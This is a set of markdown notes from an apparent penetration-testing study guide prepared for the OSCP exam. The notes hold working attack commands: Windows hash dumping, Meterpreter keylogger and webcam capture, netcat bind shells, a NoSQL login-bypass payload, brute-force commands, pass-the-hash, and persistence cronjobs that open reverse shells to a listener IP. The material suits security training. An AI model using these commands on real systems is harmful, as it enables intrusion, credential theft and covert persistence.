-------------------------------------------------------------------------------- /loot_windows_-_for_credentials_and_other_stuff.md: -------------------------------------------------------------------------------- 1 | # Loot Windows 2 | 3 | 4 | ## Meterpreter 5 | 6 | If you have a meterpreter shell you are able to do a lot of thing with very little effort. 7 | If you do not have a meterpreter-shell you can always create a exploit with msfvenom. An elf or exe or other format to upgrade your shell. 8 | 9 | Show help of all commands: 10 | ``` 11 | -h 12 | ``` 13 | 14 | **Dump windows hashes for further analysis** 15 | 16 | ``` 17 | hashdump 18 | ``` 19 | 20 | Keylogger 21 | 22 | ``` 23 | keysscan_start 24 | keyscan_dump 25 | keyscan_stop 26 | ``` 27 | 28 | **Mic and webcam commands** 29 | 30 | ``` 31 | record_mic Record audio from the default microphone for X seconds 32 | webcam_chat Start a video chat 33 | webcam_list List webcams 34 | webcam_snap Take a snapshot from the specified webcam 35 | webcam_stream Play a video stream from the specified webcam 36 | ``` 37 | 38 | 39 | ## Dumping passwords and hashes on windows 40 | 41 | This most likely requires administrative rights, that's why the chapter is found here and not in priv-esc. Once you have a hash you can move on to the Password Cracking-chapter where we discuss different techniques of cracking hashes. 42 | 43 | Windows stores passwords in SAM - Security Account Manager. Passwords are stored differently depending on the operating system. Up until (and including) Windows 2003 stored the passwords in LAN Manager (LM) and NT LAN Manager (NTLM). LM is incredibly insecure. From windows vista and on the system does not use LM, only NTLM. So it is a bit more secure. 44 | 45 | **LM and NTLM >= Windows 2003** 46 | 47 | **NTLM > Windows vista** 48 | 49 | ### LM Hashes 50 | 51 | LM hashes can be really easy to crack. The LM part in the example below is the first part. 52 | 53 | ``` 54 | Administrator:500:FA21A6D3CF(01B8BAAD3B435B51404EE:C294D192B82B6AA35C3DFCA81F1F59BC::: 55 | ``` 56 | 57 | Example of NT 58 | 59 | ``` 60 | Administrator:500:NO PASSWORD*********************:BE134K40129560B46534340292AF4E72::: 61 | ``` 62 | 63 | ### fgdump.exe 64 | 65 | We can use `fgdump.exe` (`locate fgdump.exe` on kali) to extract NTLM and LM Password hashes. Run it and there is a file called 127.0.0.1.pwndump where the hash is saved. Now you can try to brute force it. 66 | 67 | 68 | ### Windows Credencial Editor (WCE) 69 | 70 | WCE can steal NTLM passwords from memory in cleartext! 71 | There are different versions of WCE, one for 32 bit systems and one for 64 bit. So make sure you have the right one. 72 | 73 | You can run it like this 74 | ``` 75 | wce32.exe -w 76 | ``` 77 | 78 | 79 | ### Loot registry without tools 80 | 81 | This might be a better technique than using tools like wce and fgdump, since you don't have to upload any binaries. 82 | Get the registry: 83 | 84 | ``` 85 | C:\> reg.exe save hklm\sam c:\windows\temp\sam.save 86 | C:\> reg.exe save hklm\security c:\windows\temp\security.save 87 | C:\> reg.exe save hklm\system c:\windows\temp\system.save 88 | ``` 89 | 90 | The hashes can be extracted using `secretdump.py` or `pwdump` 91 | 92 | ### Pwdump 7 93 | 94 | http://www.tarasco.org/security/pwdump_7/ 95 | 96 | ## VNC 97 | 98 | VNC require a specific password to log in to. So it is not the same password as the user password. If you have a meterpreter shell you can run the post exploit module to get the VNC password. 99 | 100 | ``` 101 | background 102 | use post/windows/gather/credentials/vnc 103 | set session X 104 | exploit 105 | ``` 106 | 107 | ## Tcp-dump on winfows 108 | 109 | You can use meterpreter to easily take a tcp-dump, like this: 110 | 111 | ``` 112 | # Meterpreter 113 | run packetrecorder -li 114 | run packetrecorder -i 1 115 | ``` 116 | 117 | ### Search for interesting files 118 | 119 | ``` 120 | #Meterpreter 121 | search -f *.txt 122 | search -f *.zip 123 | search -f *.doc 124 | search -f *.xls 125 | search -f config* 126 | search -f *.rar 127 | search -f *.docx 128 | search -f *.sql 129 | 130 | # Recursive search 131 | dir /s 132 | ``` 133 | 134 | 135 | 136 | ## References 137 | 138 | This is a great post 139 | https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/ -------------------------------------------------------------------------------- /main-stackframe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/main-stackframe.png -------------------------------------------------------------------------------- /metasploit.md: -------------------------------------------------------------------------------- 1 | # Metasploit 2 | 3 | 4 | Well metasploit is of course way to big to treat in a simple book like this. But I am going to give it a shot anyways. Because what he hell, it is not like this book has a word-limit. 5 | 6 | -------------------------------------------------------------------------------- /meterpreter.md: -------------------------------------------------------------------------------- 1 | # Meterpreter 2 | 3 | Meterpreter is metasploits own shell. It runs in memory so it leaves no trace on disk. And it has a few other stealthy features. It also communicated encrypted. So that is good. 4 | 5 | There are several versions of meterpreter. And what it can do depends on the OS and how it was executed. A php-meterpreter shell will have certain functionality, and a binary-meterpreter-shell will have other. The same between different OS:s. Do know what commands you have access to on your meterpreter-shell you can run `?` in meterpreter and it will output all the commands that you have access to. -------------------------------------------------------------------------------- /modules.md: -------------------------------------------------------------------------------- 1 | # Modules 2 | 3 | -------------------------------------------------------------------------------- /msfvenom---create-shellcode.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/msfvenom---create-shellcode.md -------------------------------------------------------------------------------- /netcat.md: -------------------------------------------------------------------------------- 1 | # Netcat 2 | 3 | Hand over a shell: 4 | ``` 5 | root$ nc -lvp 4444 -e /bin/bash 6 | ``` 7 | 8 | Now connect to it from another user 9 | ``` 10 | otheruser$ nc 192.168.1.101 444 11 | whoami 12 | root 13 | ``` 14 | 15 | The same thing can be done in reverse. The one listening is giving us the shell. -------------------------------------------------------------------------------- /network_traffic.md: -------------------------------------------------------------------------------- 1 | # Network traffic 2 | 3 | So you have entered a network and it is time to start mapping it. It is probably a good idea to start monitoring the traffic. -------------------------------------------------------------------------------- /networking.md: -------------------------------------------------------------------------------- 1 | # Networking 2 | 3 | This is just some basics of networking. 4 | 5 | ## Sockets 6 | 7 | BSD Sockets (Berkely Software Distribution) 8 | 9 | ### Socket API 10 | The socket API exists in most programming languages. It is usually something like this. 11 | 12 | Socket - create a new connection endpoint 13 | bind - 14 | listen 15 | accept 16 | connect 17 | send 18 | recieve 19 | close 20 | 21 | 22 | 23 | ## References 24 | https://www.youtube.com/watch?v=zWqLYby99EU -------------------------------------------------------------------------------- /nosql-injections.md: -------------------------------------------------------------------------------- 1 | # Nosql-injections 2 | 3 | Nosql-databases like MongoDB is becoming more and more common. So this needs to be expanded. 4 | 5 | ## Login bypass 6 | 7 | Basically change the query to this. 8 | 9 | ```javascript 10 | {"user":{"$gt": ""},"pass":{"$gt": ""}} 11 | ``` 12 | 13 | 14 | http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html 15 | http://blog.websecurify.com/2014/08/attacks-nodejs-and-mongodb-part-to.html 16 | -------------------------------------------------------------------------------- /online_password_cracking.md: -------------------------------------------------------------------------------- 1 | # Online password cracking 2 | 3 | 4 | There are several tools specialized for bruteforcing online. There are several different services that are common for bruteforce. For example: VNC, SSH, FTP, SNMP, POP3, HTTP. 5 | 6 | ## Port 22 - SSH 7 | 8 | ``` 9 | hydra -l root -P wordlist.txt 192.168.0.101 ssh 10 | hydra -L userlist.txt -P best1050.txt 192.168.1.103 -s 22 ssh -V 11 | ``` 12 | 13 | 14 | 15 | ## Port 80/443 htaccess 16 | 17 | You can password protect directories with apache pretty easily. Just configure the htaccess (I exaplin this in the chapter on Common ports). 18 | 19 | It can then be brute forced like this: 20 | 21 | ``` 22 | medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/test -T 10 23 | ``` 24 | 25 | ### Logins 26 | 27 | Use Burp suite. 28 | 29 | 1. Intecept a login attempt. 30 | 2. Right-lick "Send to intruder". Select Sniper if you have nly one field you want to bruteforce. If you for example already know the username. Otherwise select cluster-attack. 31 | 3. Select your payload, your wordlist. 32 | 4. Click attack. 33 | 5. Look for response-length that differs from the rest. 34 | 35 | ## Port 161 - SNMP 36 | 37 | ``` 38 | hydra -P wordlist.txt -v 102.168.0.101 snmp 39 | ``` 40 | 41 | ## Port 3389 - Remote Desktop Protocol 42 | 43 | For RDP we can use Ncrack. 44 | 45 | ``` 46 | ncrack -vv --user admin -P password-file.txt rdp://192.168.0.101 47 | ``` -------------------------------------------------------------------------------- /oscp.md: -------------------------------------------------------------------------------- 1 | # OSCP 2 | 3 | So part of the reason I have been working on this document/notepad/book is to prepare for the oscp exam. 4 | 5 | Here are its guide-lines 6 | https://support.offensive-security.com/#!oscp-exam-guide.md 7 | 8 | ## Highlights From the Guide 9 | 10 | ### Exam Proofs: Linux 11 | 12 | > On all Linux targets, you must have a root shell to receive full points. You must provide the contents of the proof files IN A SHELL (web, bind, reverse, or ssh) with the "cat" command from their original location. Obtaining the contents of the proof files in any other way will result in zero points for the target machine. 13 | 14 | 15 | ### Forbidden tools 16 | 17 | - Spoofing (IP, ARP, DNS, NBNS, etc) 18 | - Commercial tools or services (Metasploit Pro, Burp Pro, etc.) 19 | - Automatic exploitation tools (e.g. db_autopwn, browser_autopwn, SQLmap, SQLninja etc.) 20 | - Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Canvas, Core Impact, SAINT, etc.) 21 | - Features in other tools that utilize either forbidden or restricted exam limitations 22 | 23 | ### Exam restrictions 24 | 25 | > The usage of Metasploit is restricted for the exam. You can only use Metasploit Auxiliary, Exploit, and Post modules against one target machine of your choice. Once you have selected your one target machine, you can not use Metasploit Auxiliary, Exploit, and Post modules against any other machines. 26 | 27 | ``` 28 | multi handler (aka exploit/multi/handler) 29 | meterpreter 30 | msfpayload & msfencode 31 | msfvenom 32 | ``` -------------------------------------------------------------------------------- /pass_the_hash_-_reusing_hashes.md: -------------------------------------------------------------------------------- 1 | # Pass the hash - reusing hashes 2 | 3 | Pass the hash (PTH) is a technique that lets the user authenticate by using a valid username and the hash, instead of the unhashed password. So if you have gotten a hold of a hash you might be able to use that hash against another system. 4 | 5 | Pass the hash is a suite of different tools. 6 | 7 | ## SMB 8 | 9 | So in order to use pass the hash we first need to put the hash in a env variable using the export command: 10 | 11 | So we will atuhenticate against a smb-service. 12 | 13 | ``` 14 | export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896 15 | ``` 16 | ``` 17 | pth-winexe -U administrator //192.168.1.101 cmd 18 | ``` 19 | I think you can run it like this too: 20 | 21 | ``` 22 | pth-winexe -U admin/hash:has //192.168.0.101 cmd 23 | ``` 24 | 25 | ## Remote Desktop 26 | 27 | 28 | ``` 29 | apt-get update 30 | apt-get install freerdp-x11 31 | ``` 32 | 33 | ``` 34 | xfreerdp /u:admin /d:win7 /pth:hash:hash /v:192.168.1.101 35 | ``` 36 | 37 | https://www.kali.org/penetration-testing/passing-hash-remote-desktop/ -------------------------------------------------------------------------------- /passive_information_gatherig.md: -------------------------------------------------------------------------------- 1 | # Passive information gathering 2 | 3 | It is passive in the meaning that it doesn't directly send packets to the service. But in any other sense of the word there is nothing passive about this phase. 4 | 5 | ## Visit the website 6 | 7 | Okay, I guess this actually sends packets to the target, but whatever. Visit the page, look around, read about the target. What do they do? 8 | 9 | ## Whois 10 | 11 | Find out who is behind the website. 12 | 13 | Resolve the DNS 14 | 15 | ``` 16 | host website.com 17 | nslookup website.com 18 | ``` 19 | 20 | The the IP address and check it with `whois` 21 | 22 | ``` 23 | whois 192.168.1.101 24 | ``` 25 | 26 | 27 | ## Netcraft 28 | 29 | Most of the info found on netcraft is not unique. It is basic whois info. But one thing is really good, it lists the different IP-addresses the page has had over the years. This can be a good way to **bypass cloudflare** and other services that hide the real IP. Using netcraft we can find the IP that was in use before they implemented cloudflare. 30 | 31 | Another detail that is good to know is the **hosting-company** or **domain-provider**. Those details can be used if we want to try some **social-engineering or spear-phishing attack**. 32 | 33 | [Netcraft](https://www.netcraft.com/) 34 | 35 | ## References 36 | 37 | http://www.technicalinfo.net/papers/PassiveInfoPart1.html -------------------------------------------------------------------------------- /password-cracking.md: -------------------------------------------------------------------------------- 1 | # Password Cracking 2 | 3 | 4 | 5 | ## Generate wordlists 6 | 7 | ## Offline 8 | 9 | ## Online 10 | 11 | ## Pass the hash -------------------------------------------------------------------------------- /payloads.md: -------------------------------------------------------------------------------- 1 | # Payloads 2 | 3 | 4 | There are three different types of payload modules. 5 | 6 | 1. Singles 7 | 2. Stagers 8 | 3. Stages 9 | 10 | 11 | ## Singles 12 | 13 | Singles are self-contained payloads. They can be caught with netcat for example. 14 | 15 | ## Stagers 16 | 17 | Stagers set up a network connection between the attacher and the target. This usually comes in the form of a shell. It is called stagers because it uploads several items/shells in the process. First it sets up a connection, then it improves the connection with like meterpreter. 18 | 19 | It can be that an exploit only gives you so much space to use, so instead of sending one big payload you send it in stages. 20 | 21 | ## Stages 22 | 23 | Stages are the different component that are downloaded/uploaded in the Stagers payload. 24 | -------------------------------------------------------------------------------- /persistence.md: -------------------------------------------------------------------------------- 1 | # Persistence - Rootkit - Backdoor 2 | 3 | So if you manage to compromise a system you need to make sure that you do not lose the shell. If you have used an exploit that messes with the machine the user might want to reboot, and if the user reboots you will lose your shell. 4 | 5 | Or, maybe the way to compromise the machine is really complicated or noisy and you don't want to go through the hassle of doing it all again. So instead you just create a backdoor that you can enter fast and easy. 6 | 7 | ## Create a new user 8 | 9 | The most obvious, but not so subtle way is to just create a new user (if you are root, or someone with that privilege) . 10 | 11 | ``` 12 | adduser pelle 13 | adduser pelle sudo 14 | ``` 15 | 16 | Now if the machine has `ssh` you will be able to ssh into the machine. 17 | 18 | On some machines, older Linux I think, you have to do 19 | 20 | ``` 21 | useradd pelle 22 | passwd pelle 23 | echo "pelle ALL=(ALL) ALL" >> /etc/sudoers 24 | ``` 25 | 26 | ## Crack the password of existing user 27 | 28 | Get the `/etc/shadow` file and crack the passwords. This is of course only persistent until the user decides to change his/her password. So not so good. 29 | 30 | ## SSH key 31 | 32 | Add key to existing ssh-account. 33 | 34 | ## Cronjob NC 35 | 36 | Create cronjob that connects to your machine every 10 minutes. Here is an example using a bash-reverse-shell. You also need to set up a netcat listener. 37 | 38 | Here is how you check if cronjob is active 39 | 40 | ``` 41 | service crond status 42 | pgrep cron 43 | ``` 44 | 45 | If it is not started you can start it like this 46 | 47 | ``` 48 | service crond status 49 | /etc/init.d/cron start 50 | ``` 51 | 52 | ``` 53 | crontab -e 54 | */10 * * * * 0<&196;exec 196<>/dev/tcp/192.168.1.102/5556; sh <&196 >&196 2>&196 55 | ``` 56 | 57 | ``` 58 | /10 * * * * nc -e /bin/sh 192.168.1.21 5556 59 | ``` 60 | 61 | Listener 62 | 63 | ``` 64 | nc -lvp 5556 65 | ``` 66 | 67 | Sometimes you have to set the user 68 | 69 | ``` 70 | crontab -e 71 | */10 * * * * pelle /path/to/binary 72 | ``` 73 | 74 | 75 | More here: http://kaoticcreations.blogspot.cl/2012/07/backdooring-unix-system-via-cron.html 76 | 77 | 78 | ## Metasploit persistence module 79 | 80 | Create a binary with malicious content inside. Run that, get meterpreter shell, run metasploit persistence. 81 | 82 | https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/ 83 | 84 | If you have a meterpreter shell you can easily just run `persistence`. 85 | 86 | ## Backdoor in webserver 87 | 88 | You can put a cmd or shell-backdoor in a webserver. 89 | 90 | Put backdoor on webserver, either in separate file or in hidden in another file 91 | 92 | ## Admin account to CMS 93 | 94 | Add admin account to CMS. 95 | 96 | ## Mysql-backdoor 97 | 98 | Mysql backdoor 99 | 100 | ## Hide backdoor in bootblock 101 | 102 | 103 | ## Nmap 104 | 105 | If the machine has nmap installed: 106 | 107 | https://gist.github.com/dergachev/7916152 108 | 109 | ## Setuid on text-editor 110 | 111 | You can setuid on an editor. So if you can easily enter as a www-data, you can easily escalate to root through the editor. 112 | 113 | With `vi` it is extremely easy. You just run `:shell`, and it gives you a shell. 114 | 115 | ``` 116 | # Make root the owner of the file 117 | chown root myBinary 118 | 119 | # set the sticky bit/suid 120 | chmod u+s myBinary 121 | ``` 122 | 123 | ## References 124 | 125 | 126 | Read this 127 | https://gist.github.com/dergachev/7916152 128 | 129 | This is a creat introduction 130 | http://www.dankalia.com/tutor/01005/0100501002.htm 131 | 132 | 133 | 134 | 135 | 136 | 137 | -------------------------------------------------------------------------------- /physical_access_to_machine.md: -------------------------------------------------------------------------------- 1 | # Physical access to machine 2 | 3 | So if you have physical access to a machine that is not encrypted it is really trivial to gain access to the hard-drive and all files on it. 4 | 5 | This is how you do it 6 | 7 | ## Create linux-usb 8 | 9 | Just follow this guide for ubuntu 10 | http://www.ubuntu.com/download/desktop/create-a-usb-stick-on-ubuntu 11 | 12 | ## Boot into live-usb on victim machine 13 | 14 | If the machine doesn't automatically detect the usb you might have to enter into the bios. This can usually be done by pressing F12 or F1 on boot. Bios looks different from machine to machine. But you need to just choose to boot from the USB-device. 15 | 16 | ## Mount disk 17 | 18 | Now you have booted into the live-usb, now we need to mount the hard-drive to the usb-linux-filesystem. 19 | First we want to find out what partitions we have: 20 | 21 | ``` 22 | sudo su 23 | fdisk -l 24 | ``` 25 | This will give you a list of partitions. They will look something like this 26 | 27 | ``` 28 | /dev/sda1 29 | /dev/sda2 30 | ``` 31 | 32 | Identify from the list the partition you want to mount. 33 | 34 | Here we create a space for where we want to mount the partition. 35 | ``` 36 | mkdir /media/windows 37 | ``` 38 | 39 | ``` 40 | mount -t ntfs /dev/sda1 /media/windows 41 | ``` 42 | 43 | `-t`means type, and refers to the filesystem-type. And we choose ntfs which is the windows-filesystem. 44 | 45 | Now you can access all the files from the harddrive in `/media/windows` 46 | 47 | ## Umount the disk 48 | 49 | Notice that is is `umount` and not unmount. 50 | 51 | ``` 52 | umount /media/windows 53 | ``` 54 | 55 | 56 | ## Dump the hashes 57 | 58 | https://prakharprasad.com/windows-password-cracking-using-john-the-ripper/ -------------------------------------------------------------------------------- /pivoting.md: -------------------------------------------------------------------------------- 1 | # Pivoting 2 | 3 | Let's say that you have compromised one machine on a network and you want to keep going to another machine. You will use the first machine as a staging point/plant/foothold to break into machine 2. Thid technique of using one compromised machine to access another is called pivoting. Machine one is the `pivot` in the example. The `pivot` is just used as a way to channel/tunnel our attack. 4 | 5 | #### Ipconfig 6 | 7 | We are looking for machines that have at least THREE network interfaces (loopback, eth0, and eth1 (or something)). These machines are connected to other networks, so we can use them to pivot. 8 | 9 | ``` 10 | # Windows 11 | ipconfig /all 12 | route print 13 | 14 | #Linux 15 | ifconfig 16 | ifconfig -a 17 | ``` 18 | 19 | ## Metasploit 20 | 21 | 22 | ### Ping-sweep the network 23 | 24 | First we want to scan the network to see what devices we can target. In this example we already have a meterpreter shell on a windows machine with SYSTEM-privileges. 25 | 26 | ``` 27 | meterpreter > run arp_scanner -r 192.168.1.0/24 28 | ``` 29 | This command will output all the devices on the netowork. 30 | 31 | ### Scan each host 32 | 33 | Now that we have a list of all available machines. We want to portscan them. 34 | 35 | We will to that portscan through metasploit. Using this module: 36 | 37 | ``` 38 | use auxiliary/scanner/portscan/tcp 39 | ``` 40 | 41 | If we run that module now it will only scan machines in the network we are already on. So first we need to connect us into the second network. 42 | 43 | On the already pwn machine we do 44 | 45 | ``` 46 | ipconfig 47 | ``` 48 | 49 | Now we add the second network as a new route in metasploit. First we background our session, and then do this: 50 | 51 | ``` 52 | # the ip addres and the subnet mask, and then the meterpreter session 53 | route add 192.168.11.1 255.255.255.0 1 54 | ``` 55 | 56 | Now we can run our portsanning module: 57 | 58 | ``` 59 | use auxiliary/scanner/portscan/tcp 60 | ``` 61 | 62 | ### Attack a specific port 63 | 64 | In order to attack a specific port we need to forwards it like this 65 | 66 | ``` 67 | portfwd add -l 3389 -p 3389 -r 192.168.1.222 68 | ``` 69 | 70 | 71 | 72 | This is a good video-explanation: 73 | https://www.youtube.com/watch?v=c0XiaNAkjJA 74 | 75 | https://www.offensive-security.com/metasploit-unleashed/pivoting/ 76 | 77 | http://ways2hack.com/how-to-do-pivoting-attack/ -------------------------------------------------------------------------------- /port_knocking.md: -------------------------------------------------------------------------------- 1 | # Port knocking 2 | 3 | Port-knocking the a obfuscation-as-security technique. It basically means that after knocking on ports in a specific sequence a certain port will open automatically. It seems to be more popular in Capture-the-flag contests than real life networks. But I have included it anyways, since CTF:s are great. 4 | 5 | This is a way to hide certain ports, so you don't get unwanted intrusion-intents. 6 | 7 | So for example, imagine you access your server through `ssh`. But you are tired of getting unwanted bruteforce attempts all day long. You can just have the SSH-port closed and when you knock on certain ports in a specific order the ssh-port opens up, maybe for a few minutes, or maybe indefinitely until you close it again. 8 | 9 | When you "knock" on a port you are really just sending TCP-packets with `SYN`-flag to that port. The closed port will then respond with a `ACK/RST`. Which basically means that the host has received the `TCP`-packet, and it ACKnolwdge it, but responds with a Reset (`RST`) flag. `RST` just means that the port is closed. 10 | 11 | ## Software to implement port-knocking 12 | 13 | I have seen the Knock software implemented. 14 | 15 | ## Opening 16 | 17 | So, how do we actually knock? 18 | As mentioned before a knock is essentially just sending a packet to a specific port. 19 | I guess there are quite a few ways to do this. But here are three ways. 20 | 21 | 1. Knock 22 | - `apt-get install knockd` 23 | - Then you simply type: `knock [ip] [port]`. For example: `knock 192.168.1.102 4000 5000 6000` 24 | - After that you have to scan the network to see if any new port is open. 25 | - If you know what port is open you can connect to the port using netcat. The following command would work `nc 192.168.1.102 8888`. This would then connect to the port. 26 | 27 | 2. Nmap/bash 28 | - `for x in 4000 5000 6000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x server_ip_address; done` 29 | 3. Netcat 30 | ``` 31 | nc 192.168.1.102 4000 32 | nc 192.168.1.102 5000 33 | nc 192.168.1.102 6000 34 | nc 192.168.1.102 8888 35 | ``` 36 | 37 | ## Break it 38 | 39 | One way hack a server with port-knocking implemented would be to sniff for packets on the network. So if you are on the same network and able to make MITM, you can just sniff that traffic and then find the sequence. 40 | 41 | 42 | ## Pitfalls 43 | 44 | Using port-knocking as a way to secure your service might come with some risk. The biggest risk I suppose is that if the knock-daemon fails, for whatever reason. You will be shut out of you machine. There are of course ways to just restart the knock-daemon if it fails. But maybe that daemon fails as well. 45 | 46 | 47 | 48 | ### References 49 | 50 | This wikipedia-article is really worth reading. 51 | https://en.wikipedia.org/wiki/Port_knocking 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /port_scanning.md: -------------------------------------------------------------------------------- 1 | # Port Scanning 2 | 3 | ## TLDR 4 | 5 | ``` 6 | # Stealthy 7 | nmap -sS 10.11.1.X 8 | 9 | # Scan all ports, might take a while. 10 | nmap 10.11.1.X -p- 11 | 12 | # Scan for UDP 13 | nmap 10.11.1.X -sU 14 | unicornscan -mU -v -I 10.11.1.X 15 | 16 | # Scan for version, with NSE-scripts and trying to identify OS 17 | nmap 10.11.1.X -sV -sC -O 18 | 19 | # All out monsterscan 20 | nmap -vvv -Pn -A -iL listOfIP.txt 21 | 22 | # Fast scan 23 | nmap 10.11.1.X -F 24 | 25 | # Only scan the 100 most common ports 26 | nmap 10.11.1.X --top-ports 100 27 | ``` 28 | 29 | ## Nmap 30 | 31 | Now that you have gathered some IP addresses from your subdomain scanning it is time to scan those addresses. You just copy-paste those addresses and add them to a file, line by line. Then you can scan all of them with nmap at the same time. Using the `-iL` flag. 32 | 33 | ### Basics - tcp-connect scan 34 | 35 | Okay, so a bit of the basics of Nmap and how it works. When one machine initiate a connection with another machine using the **transmission-control protocol (tcp)** it performs what is know as a three-way handshake. That means: 36 | ``` 37 | machine1 sends a syn packet to machine2 38 | machine2 send a syn-ack packet to machine1 39 | machine1 sends a ack packet to machine2. 40 | ``` 41 | 42 | If machine2 responds with a syn-ack we know that that port is open. This is basically what nmap does when it scans for a port. 43 | If machine1 omits the last ack packet the connection is not made. This can be a way to make less noise. 44 | 45 | This is the default mode for nmap. If you do not add any flags and scan a machine this is the type of connection it creates. 46 | 47 | ### "Stealthy" -sS 48 | 49 | By adding the `-sS` flag we are telling nmap to not finalize the three way handshake. It will send a `syn`, receive `syn-ack` (if the port is open), and then terminate the connection. This used to be considered stealthy before, since it was often not logged. However it should not be considered stealthy anymore. 50 | 51 | In the flag I imagine that the first `s` stands for scan/scantype and the second `S` stands for `syn`. 52 | 53 | So `-sS` can be read as **scantype syn** 54 | 55 | ### UDP scan 56 | 57 | UDP is after TCP the most common protocol. DNS (53), SNMP (161/162) and DHCP (67/68) are some common ones. Scanning for it is slow and unreliable. 58 | 59 | ``` 60 | -sU 61 | ``` 62 | 63 | 64 | #### Output scan to a textfile 65 | 66 | Not all output works with grepable format. For example NSE does not work with grepable. So you might want to use xml instead. 67 | 68 | ``` 69 | # To text-file 70 | -oN nameOfFile 71 | 72 | # To grepable format 73 | -oG nameOfFile 74 | 75 | # To xml 76 | -oX nameOfFile 77 | 78 | ``` 79 | 80 | 81 | ### Scan an entire IP-range 82 | 83 | You might find that a site has several machines on the same ip-range. You can then use nmap to scan the whole range. 84 | 85 | The `-sn` flag stops nmap from running port-scans. So it speeds up the process. 86 | 87 | ``` 88 | nmap -vvv -sn 201.210.67.0/24 89 | ``` 90 | 91 | You can also specify a specific range, like this 92 | 93 | ``` 94 | nmap -sP 201.210.67.0-100 95 | ```` 96 | 97 | #### Sort out the machines that are up 98 | 99 | So let's say you find that 40 machine exists in that range. We can use grep to output those IP:s. 100 | 101 | First let's find the IPs that were online. Ip-range is the output from previous command. You can of course combine them all. 102 | 103 | ```bash 104 | cat ip-range.txt | grep -B 1 "Host is up" 105 | ``` 106 | 107 | Now let's sort out the ips from that file. 108 | 109 | ```bash 110 | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' ip-range.txt > only-ip.txt 111 | ``` 112 | 113 | Now you can input all those ips to nmap and scan them. 114 | 115 | 116 | #### Scan a range and output if a specific port is open 117 | 118 | Nmap has a command to make the output grepable. 119 | 120 | ```bash 121 | nmap -vvv -p 80 201.210.67.0-100 -oG - | grep 80/open 122 | ``` 123 | 124 | ### Nmap scripts 125 | 126 | This chapter could also be placed in Vulnerability-analysis and Exploitation. Because nmap scripting is a really versatile tool that can do many things. Here we will focus on it's ability to retrieve information that can be useful in the process to **find vulnerabilities** 127 | 128 | 129 | First locate the nmap scripts. Nmap scripts end in `.nse`. For Nmap script engine. 130 | 131 | ``` 132 | locate *.nse 133 | ``` 134 | 135 | The syntax for running a script is: 136 | 137 | ``` 138 | nmap --script scriptname 192.168.1.101 139 | ``` 140 | 141 | 142 | To find the "man"-pages, the info about a script we write: 143 | 144 | ``` 145 | nmap -script-help http-vuln-cve2013-0156.nse 146 | ``` 147 | 148 | **Run multiple scripts** 149 | 150 | Can be run by separating the script with a comma 151 | 152 | ``` 153 | nmap --script scriptone.nse,sciprt2.nse,script3.nse 192.168.1.101 154 | ``` 155 | 156 | Run the default scripts 157 | 158 | ``` 159 | nmap -sC example.com 160 | ``` 161 | 162 | 163 | ## Metasploit 164 | 165 | We can do port-scanning with metasploit and nmap. And we can even integrate nmap into metasploit. This might be a good way to keep your process neat and organized. 166 | 167 | ### db_nmap 168 | 169 | You can run `db_nmap` and all the output will be stored in the metasploit database and available with 170 | 171 | ``` 172 | hosts 173 | services 174 | ``` 175 | 176 | You can also import nmap scans. But you must first output it in xml-format with the following flag 177 | 178 | ``` 179 | nmap 192.168.1.107 -oX result.xml 180 | ``` 181 | 182 | Good practice would be to output the scan-results in xml, grepable and normal format. You do that with 183 | 184 | ``` 185 | nmap 192.168.1.107 -oA result 186 | ``` 187 | 188 | Then you can load it into the database with the following command. 189 | 190 | ``` 191 | db_import /path/to/file.xml 192 | ``` 193 | 194 | ### Metasploit PortScan modules 195 | 196 | If you for some reason don't have access to nmap you can run metasploits modules that does portscans 197 | 198 | ``` 199 | use auxiliary/scanner/portscan/ 200 | ``` 201 | 202 | -------------------------------------------------------------------------------- /post_exploitation.md: -------------------------------------------------------------------------------- 1 | # Post Exploitation 2 | 3 | In order to move horizontally on the network we need to know as much about the machine as possible. We need to loot it. These are some things that must be done on every compromised machine. 4 | 5 | 6 | ### Tcp dump 7 | Who else is connected to the machine? 8 | 9 | ### Dump the hashes 10 | 11 | It is always good to have a list of all the hashes and crack them. Maybe someone is reusing the password. 12 | 13 | ### To what is the machine connected? 14 | 15 | netstat 16 | 17 | ipconfig 18 | 19 | ### Email and personal files 20 | 21 | ### Logs 22 | 23 | 24 | -------------------------------------------------------------------------------- /powershell.md: -------------------------------------------------------------------------------- 1 | # PowerShell 2 | 3 | PowerShell is Windows new shell. It comes by default from Windows 7. But can be downloaded and installed in earlier versions. 4 | 5 | * PowerShell provides access to almost everything an attacker might want. 6 | * It is based on the .NET framework. 7 | * It is basically bash for windows 8 | * The commands are case-insensitive 9 | 10 | ## Basics 11 | 12 | So a command in PowerShell is called **cmdlet**. The cmdlets are created using a verb and a noun. Like `Get-Command`, Get is a verb and Command is a noun. Other verbs can be: remove, set, disable, install, etc. 13 | 14 | 15 | 16 | To get help on how to use a **cmdlet** while in PowerShell, the man-page, you do: 17 | 18 | ``` 19 | Get-Help 20 | ``` 21 | 22 | Example 23 | 24 | ``` 25 | get-help echo 26 | get-help get-command 27 | ``` 28 | 29 | **Powershell Version and Build** 30 | 31 | ``` 32 | $PSVersionTable 33 | ``` 34 | 35 | ### Fundamentals 36 | 37 | With get-member you can list all the properties and methods of the object that the command returns. 38 | 39 | ``` 40 | Get-Member 41 | For example: 42 | Get-Command | Get-Member 43 | Get-Process | Get-Member 44 | ``` 45 | 46 | 47 | 48 | Select-XXX 49 | 50 | ``` 51 | Select-object 52 | ``` 53 | 54 | 55 | 56 | #### Variables 57 | 58 | ``` 59 | $testVar = "blabla" 60 | ``` 61 | 62 | 63 | 64 | 65 | 66 | **Wget / Download a file** 67 | 68 | ``` 69 | Invoke-WebRequest 70 | wget 71 | ``` 72 | 73 | **Grep** 74 | 75 | ``` 76 | Select string can 